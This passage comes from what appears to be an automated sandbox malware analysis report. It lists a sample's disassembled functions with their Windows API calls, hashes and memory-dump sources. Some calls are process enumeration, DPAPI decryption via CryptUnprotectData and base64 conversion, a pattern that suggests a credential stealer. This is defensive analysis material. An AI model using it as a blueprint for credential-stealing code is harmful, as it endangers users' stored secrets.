                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 7985dd6c1aa372993f9bd5ad6c016eff6b524ecfb814f05fda596d450787c378
                              • Instruction ID: cf531f62ffa6cbaeafb6d6a132b509d3129fe81fe812809e9ee10e912aad8786
                              • Opcode Fuzzy Hash: 7985dd6c1aa372993f9bd5ad6c016eff6b524ecfb814f05fda596d450787c378
                              • Instruction Fuzzy Hash: 59311C71901218ABCB24DF55DC85FEEB778EF49700F1041AAB50AB61A0DF346A49CFA1
                              Function 00C68EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00C55184,40000001,00000000,00000000,?,00C55184), ref: 00C68EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 9fb8d7c71d5d64bdf76eda35ca6ef2a7052752df8e7e7517802a647e6a55a8a3
                              • Instruction ID: a04fcba28a203bb64ea9043f1a306f45f048ef57a669b22427938291c843a125
                              • Opcode Fuzzy Hash: 9fb8d7c71d5d64bdf76eda35ca6ef2a7052752df8e7e7517802a647e6a55a8a3
                              • Instruction Fuzzy Hash: 5F111C74204204BFDB14CFA5D889FAB33A9AF89300F149659F9158B250DB35ED49DB61
                              Function 00C59AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C54EEE,00000000,00000000), ref: 00C59AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00C54EEE,00000000,?), ref: 00C59B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C54EEE,00000000,00000000), ref: 00C59B2A
                              • LocalFree.KERNEL32(?,?,?,?,00C54EEE,00000000,?), ref: 00C59B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: db4005b71c9ac42bcc5b40da96ba49f5e8857db40e5141247be3245802090637
                              • Instruction ID: 732a62921296dd383f702a531e78fedf311275ab00b9046428723684c7c42f56
                              • Opcode Fuzzy Hash: db4005b71c9ac42bcc5b40da96ba49f5e8857db40e5141247be3245802090637
                              • Instruction Fuzzy Hash: E511A4B4240208EFEB14CF64DC99FAA77B5FB89701F208059FD199B390C775AA45CB94
                              Function 00C67980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C70E00,00000000,?), ref: 00C679B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C679B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00C70E00,00000000,?), ref: 00C679C4
                              • wsprintfA.USER32 ref: 00C679F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: abd776874311ae70b9287bd8fc5ad16a25110a103b69d709aa7449a93050b466
                              • Instruction ID: 2f61bd95ac6d0f9cfd30b9806c473ebadefd21e0437ac31018ab34475deb4661
                              • Opcode Fuzzy Hash: abd776874311ae70b9287bd8fc5ad16a25110a103b69d709aa7449a93050b466
                              • Instruction Fuzzy Hash: FA112AB2904118ABCB14DFCADD49BBEB7F8FB4CB11F14425AF605A2280D6395944C7B1
                              Function 00C67A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,007FE158,00000000,?,00C70E10,00000000,?,00000000,00000000), ref: 00C67A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C67A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,007FE158,00000000,?,00C70E10,00000000,?,00000000,00000000,?), ref: 00C67A7D
                              • wsprintfA.USER32 ref: 00C67AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 5f08fe19bc59a83cfffa76e7b8711b9679e2448b31c255e44401e1a837bd795a
                              • Instruction ID: 43500b7cb423f3a92b50ab7491fb884363238bd85d10183c405220b193df01e5
                              • Opcode Fuzzy Hash: 5f08fe19bc59a83cfffa76e7b8711b9679e2448b31c255e44401e1a837bd795a
                              • Instruction Fuzzy Hash: 93118EB1A45218EFEB209B55DC49FA9B778FB04721F1047EAE91AA32C0C7741A44DF91
                              Function 01031236 Relevance: 5.8, Strings: 4, Instructions: 813COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .({#$/U|T$Ksk8$oi=
                              • API String ID: 0-3801719784
                              • Opcode ID: 1fdcf867671f76344cdd8636d9c3d8733c558173f028b8cd115f06778f789706
                              • Instruction ID: 28957e8fba37a06580c26ce9056b5028747240fa2028887aeb2e74814837eff8
                              • Opcode Fuzzy Hash: 1fdcf867671f76344cdd8636d9c3d8733c558173f028b8cd115f06778f789706
                              • Instruction Fuzzy Hash: A74227F360C2009FE7086E2DEC8567AB7E9EB94720F168A3EE6C5C3744E63558018797
                              Function 00C63720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(00C6E118,00000000,00000001,00C6E108,00000000), ref: 00C63758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C637B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 71e33b1a122bfc893de2b17e0fded32c1a18101dc7946bd749152401ae9edfe0
                              • Instruction ID: 2dc6558aaf34e28ba363185d81be4ca6f5fe37a67ceefd1fdba5438ae9cf2ea1
                              • Opcode Fuzzy Hash: 71e33b1a122bfc893de2b17e0fded32c1a18101dc7946bd749152401ae9edfe0
                              • Instruction Fuzzy Hash: F241F774A00A289FDB24DB58CC95BDBB7B5BB48702F4051D9E608E72D0E771AE85CF50
                              Function 00C59B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C59B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C59BA3
                              • LocalFree.KERNEL32(?), ref: 00C59BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 5af79ab186f89cbe7a5e4a943f44eb1a051cb4fd1d73c7a192eba2fcf8ee9413
                              • Instruction ID: d0b1e53a914fcdb3e79f997ea0a137163a9ca9a81a6b2985888a9e8399efac0d
                              • Opcode Fuzzy Hash: 5af79ab186f89cbe7a5e4a943f44eb1a051cb4fd1d73c7a192eba2fcf8ee9413
                              • Instruction Fuzzy Hash: A311C9B8A00209EFDB04DF94D989AAEB7B5FF88300F1045A9ED15A7350D774AE54CFA1
                              Function 0102555A Relevance: 3.2, Strings: 2, Instructions: 654COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 'fZS$S]l
                              • API String ID: 0-4242958975
                              • Opcode ID: 677da922e93a6aa53bb85287a00d37c4cc4197a1772871f4934f674154a37232
                              • Instruction ID: 1a0b8e9ba3cbf6b01a0c5378d47198aa51548f41f4a615a5d1ec2fb716f58209
                              • Opcode Fuzzy Hash: 677da922e93a6aa53bb85287a00d37c4cc4197a1772871f4934f674154a37232
                              • Instruction Fuzzy Hash: F82208F3A0C2049FE708AF2DEC8573ABBE6EF94720F1A853DE6C583744E93558058656
                              Function 00FA88CF Relevance: 2.7, Strings: 2, Instructions: 205COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: tD<e$1c
                              • API String ID: 0-4293494802
                              • Opcode ID: 1f83a04676e4293889eac5e1d92dfccbbde981fb21f220aa8457747cb742b713
                              • Instruction ID: 620d188f0370f6a6d2cf50fa8f875071b2703b7b89fad4021b074fbc97e74b8b
                              • Opcode Fuzzy Hash: 1f83a04676e4293889eac5e1d92dfccbbde981fb21f220aa8457747cb742b713
                              • Instruction Fuzzy Hash: 6E510CB3A082009FE3146E2DDD8533AB7D6EFD4B20F16863CEA8497784E53959068797
                              Function 01063826 Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #yw)$ZC^?
                              • API String ID: 0-2541064788
                              • Opcode ID: 7f17ad3de818cbe33da3bbebdc4401d0a5f557ad269e31f1823ed78d560e4858
                              • Instruction ID: 728167eda40ff65dd6b5339d7a27d13d9617df2f40b6201608c9cadeb4a93576
                              • Opcode Fuzzy Hash: 7f17ad3de818cbe33da3bbebdc4401d0a5f557ad269e31f1823ed78d560e4858
                              • Instruction Fuzzy Hash: 8E31C3B250C700DFD3406A299D8437EB7EABBE4350F66C92D96CA0A618E27499418AD3
                              Function 00F290F6 Relevance: 1.4, Strings: 1, Instructions: 198COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Juvr
                              • API String ID: 0-1085866910
                              • Opcode ID: 85b99153a5487f211b04b4de951b60a67b2cb46d4e144a2222fc808102c57a09
                              • Instruction ID: 29b15ed431316c45f0b97721d1de484a84bbc77f974fe9eff3aa3bb318283dde
                              • Opcode Fuzzy Hash: 85b99153a5487f211b04b4de951b60a67b2cb46d4e144a2222fc808102c57a09
                              • Instruction Fuzzy Hash: 3D51D3F3A082049FE754AE2DDC5173ABBE5EBD4320F16853DEB88D3384E97548018696
                              Function 00F92759 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
